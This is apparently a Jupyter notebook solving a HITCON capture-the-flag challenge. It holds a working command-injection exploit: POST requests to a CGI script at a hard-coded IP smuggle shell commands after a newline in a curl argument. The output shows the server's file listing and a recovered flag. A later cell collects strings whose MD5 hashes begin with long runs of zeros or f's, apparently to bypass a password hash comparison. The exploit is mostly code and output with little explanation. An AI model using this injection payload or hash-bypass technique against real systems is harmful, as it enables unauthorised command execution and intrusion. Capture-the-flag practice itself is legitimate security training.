In [2]:
import requests
In [10]:
headers = dict()
headers = {'User-Agent': 'Mozilla/5.0'}
cookies = {"diagsess":"../etc/passwd"} # doesn't matter
cmd =" ls /"
payload = {"action": "curl", "arg": "aaa -w xxx\n"+cmd}
r = requests.post("http://54.92.127.128:16888/cgi-bin/dana-na.cgi?sechash=", data=payload, cookies=cookies, headers=headers)
print r.content[r.content.find(">xxx")+4:]
bin
boot
dev
etc
home
initrd.img
key.txt
lib
lib64
lost+found
media
mnt
opt
proc
read_key
root
run
sbin
srv
sys
tmp
usr
var
vmlinuz

In [11]:
cmd = "/read_key /key.txt"
# or use python to read stderr
# cmd = "python -c s=__import__('subprocess');print(s.check_output('/read_key'+chr(32)+'/key.txt',stderr=s.STDOUT,shell=True))"
payload = {"action": "curl", "arg": "aaa -w xxx\n"+cmd}
r = requests.post("http://54.92.127.128:16888/cgi-bin/dana-na.cgi?sechash=", data=payload, cookies=cookies, headers=headers)
print r.content[r.content.find(">xxx")+4:]
HITCON{a755be06b165ed8fc4710d3544fce942}


In [9]:
# BTW, attempts to find an admin password
# from http://calebmadrigal.com/display-list-as-table-in-ipython-notebook/
class ListTable(list):
    """ Overridden list class which takes a 2-dimensional list of 
        the form [[1,2,3],[4,5,6]], and renders an HTML Table in 
        IPython Notebook. """
    
    def _repr_html_(self):
        html = ["<table>"]
        for row in self:
            html.append("<tr>")            
            html.extend("<td>{0}</td>".format(col) for col in row)            
            html.append("</tr>")
        html.append("</table>")
        return ''.join(html)
    
from hashlib import md5
L =[  "djGFYmi", "ZkjAFaaaa", 
          "G/I2/vILur4AAAAAaHR0cDovL2hhc2hjYXQubmV0LwA=".decode("base64"),
         "Vf3ppC4Iu74AAAAAaHR0cDovL2hhc2hjYXQubmV0LwA=".decode("base64"),
        "6Za/F6+mur4AAAAAaHR0cDovL2hhc2hjYXQubmV0LwA= ".decode("base64"),       
         'Kdr.b4v', 'K1UgX15KGWDJKTdo', 'xIoN=JG', 'http://weijr-eng.blogspot.com               GE\x00\x00\x0f\xe5\xef\x0b']
L+=[ 'b81.org/kpoz&AV' , 'b81.org/GD9FD&Sa', 'b81.org/S27Mp1Ya', 'http://weijr-eng.blogspot.com               \xbf\x13\x00\x00\xbd\xae\xcb`']
L+=['http://weijr-eng.blogspot.com               \xcb<\x00\x00\xf9\xc8P\xd4', 'http://weijr-eng.blogspot.com               \x97\xa1\x00\x00T3z\x0c']
S = sorted( (md5(x).hexdigest(), x) for x in L )
ListTable([['Leading 0 or f', 'md5 hexdigest', 'plaintext']]+[[[i for i in range(len(s[0])-1) if s[0][i]!=s[0][i+1]][0]+1, s[0], repr(s[1])] for s in S])
Out[9]:
Leading 0 or fmd5 hexdigestplaintext
13000000000000079ad03b44781b4e6c59'http://weijr-eng.blogspot.com \xcb<\x00\x00\xf9\xc8P\xd4'
120000000000006c32a237fc882cc44a4b'U\xfd\xe9\xa4.\x08\xbb\xbe\x00\x00\x00\x00http://hashcat.net/\x00'
120000000000008d003b0ffcf6b666342e'xIoN=JG'
1100000000000277ec3301b3cabacb95c9'\x1b\xf26\xfe\xf2\x0b\xba\xbe\x00\x00\x00\x00http://hashcat.net/\x00'
1100000000000639f3eb26b63f0a7baca3'ZkjAFaaaa'
1100000000000b814f9865b26c0ebb4136'Kdr.b4v'
1100000000000ccda838e4b06d6d662dca'djGFYmi'
10000000000016deedb58402856305e702'b81.org/GD9FD&Sa'
10ffffffffffe538aaef4811a59ec8af0f'b81.org/S27Mp1Ya'
10ffffffffffe9b60be6c8e43b80c29582'http://weijr-eng.blogspot.com \xbf\x13\x00\x00\xbd\xae\xcb`'
11fffffffffff5d05f4b93da2870f43376'K1UgX15KGWDJKTdo'
11fffffffffff8821c53918df398cda5d8'b81.org/kpoz&AV'
11fffffffffffd880637cda3008c943ce6'http://weijr-eng.blogspot.com GE\x00\x00\x0f\xe5\xef\x0b'
12ffffffffffff4de6f952846ffc0f4d15'\xe9\x96\xbf\x17\xaf\xa6\xba\xbe\x00\x00\x00\x00http://hashcat.net/\x00'
13fffffffffffff194e10443811b0ca0cd'http://weijr-eng.blogspot.com \x97\xa1\x00\x00T3z\x0c'
In [10]:
with open('md5low','w') as f:
    f.write('http://weijr-eng.blogspot.com               \xcb<\x00\x00\xf9\xc8P\xd4')
with open('md5high', 'w') as f:
    f.write('http://weijr-eng.blogspot.com               \x97\xa1\x00\x00T3z\x0c')
In [ ]: